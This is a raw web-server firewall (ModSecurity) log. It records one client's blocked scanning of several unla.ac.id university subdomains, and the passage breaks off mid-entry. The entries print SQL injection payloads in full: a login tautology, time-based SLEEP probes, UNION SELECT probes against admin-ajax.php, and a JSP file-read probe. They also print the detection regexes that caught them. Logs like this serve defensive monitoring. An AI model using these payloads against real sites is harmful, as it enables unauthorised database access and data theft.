[Tue Aug 29 11:34:49.297641 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAATmZdYAAAAr"]
[Tue Aug 29 11:34:49.302730 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAATZp6EAAAAf"]
[Tue Aug 29 11:34:49.308504 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAAUJIyEAAABB"]
[Tue Aug 29 11:34:49.309659 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAAUQ7r8AAABH"]
[Tue Aug 29 11:34:49.312760 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAAT@KvkAAAA2"]
[Tue Aug 29 11:34:49.314128 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAASEJXQAAAAE"]
[Tue Aug 29 11:34:49.315453 2023] [:error] [pid 1292] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAAUMVNEAAABE"]
[Tue Aug 29 11:34:49.321020 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAAUdm3kAAABS"]
[Tue Aug 29 11:34:49.324143 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAATUxQ0AAAAW"]
[Tue Aug 29 11:34:49.325714 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAARjjWsAAAAL"]
[Tue Aug 29 11:34:49.326762 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAATfd3gAAAAk"]
[Tue Aug 29 11:34:49.327778 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAATZp6IAAAAf"]
[Tue Aug 29 11:34:49.329672 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAAUJIyIAAABB"]
[Tue Aug 29 11:34:49.333775 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAATavugAAAAg"]
[Tue Aug 29 11:34:49.334009 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAATmZdcAAAAr"]
[Tue Aug 29 11:34:49.334426 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAAPLwJgAAAAX"]
[Tue Aug 29 11:34:49.340749 2023] [:error] [pid 1240] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAATYeEcAAAAd"]
[Tue Aug 29 11:34:49.343945 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAAUIz7kAAABA"]
[Tue Aug 29 11:34:49.344084 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAAUR830AAABI"]
[Tue Aug 29 11:34:49.345412 2023] [:error] [pid 1256] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAATovnQAAAAt"]
[Tue Aug 29 11:34:50.308204 2023] [:error] [pid 1282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11asCo-f0AAAUCJdgAAAA6"]
[Tue Aug 29 11:34:50.316294 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11asCo-f0AAASI0EMAAAAG"]
[Tue Aug 29 11:34:50.317099 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11asCo-f0AAAPLwJkAAAAX"]
[Tue Aug 29 11:34:50.318215 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11asCo-f0AAARdiScAAAAK"]
[Tue Aug 29 11:34:51.568327 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAAUJIyUAAABB"]
[Tue Aug 29 11:34:51.575970 2023] [:error] [pid 1292] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAAUMVNQAAABE"]
[Tue Aug 29 11:34:51.577135 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAASOUpEAAAAR"]
[Tue Aug 29 11:34:51.577470 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAAUDQTAAAAA7"]
[Tue Aug 29 11:34:51.582241 2023] [:error] [pid 1237] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname 